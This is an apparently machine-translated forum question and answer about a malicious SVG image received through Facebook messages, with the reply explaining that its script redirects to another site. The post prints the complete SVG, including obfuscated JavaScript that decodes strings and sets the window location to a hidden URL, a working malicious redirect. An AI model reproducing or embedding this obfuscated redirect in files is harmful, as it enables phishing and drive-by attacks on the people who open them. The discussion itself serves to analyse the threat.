恶意JavaScriptembedded在SVG – 它做什么?

我收到了两个文件(SVG图片)的facebook消息,我点击了其中的一个(我不知道为什么:(),然后打开红点的新标签,然后我立即被redirect到一些假装看起来像Youtube的网站( http://kerman.pw/?fb_dsa )。

然后我使用“保存链接为…”function下载.svg文件。 这似乎是一些JavaScript代码embedded到SVG,所以我在这里发布(我不知道JS非常好):

 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg"> <circle cx="250" cy="250" r="50" fill="red" /> <script type="text/javascript"><![CDATA[ function xcxxy(gyqbv,hzrgh,ktjrf){ var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6"; var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"]; var bnkdip = ""; var igrqm = 0; while(vyqsvo[igrqm]){ igrqm++; } var kwwtmh = 0; while(gyqbv[kwwtmh]){ var jikaig = 0; var axfnq = -1; while(qixua[jikaig]){ if(qixua[jikaig] == gyqbv[kwwtmh]){ axfnq = jikaig; break; } jikaig++; } if(axfnq >= 0){ var abxnk = 0; var wjtfca = -1; while(vyqsvo[kwwtmh%igrqm][abxnk]){ if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){ wjtfca = abxnk; break; } abxnk++; } bnkdip += qixua[wjtfca]; }else{ bnkdip += gyqbv[kwwtmh]; } kwwtmh++; } var evhrt = ""; for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){ evhrt += bnkdip[izqfrv]; } bnkdip = evhrt; return bnkdip; } var obejok = window; var iyysri = xcxxy("sUTA:Gkb106SzH",11,false); var leizjp = xcxxy("kBB?5S:Uh",1,false); var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false); obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false); ]]></script> </svg> 

我真的知道JavaScript,所以我想问它可以做什么? 它能伤害我吗? 非常感谢你

你是正确的SVG文件嵌入JavaScript。 SVG是矢量图形文件,它将根据文件内的指令在浏览器中绘制图像。 你找到的SVG包含混淆的JavaScript来隐藏实际正在发生的事情。

从我所看到的内容来看,这是一个脚本来打开一个新的浏览器窗口,并加载一个新的URL,所以它本身并不危险,这一切都取决于它重定向到哪个网站,以及什么脚本设置为当您到达网站时启动。

所以简而言之,假设您被重定向到的网站是恶意的,这会损害您的电脑。

我希望有帮助。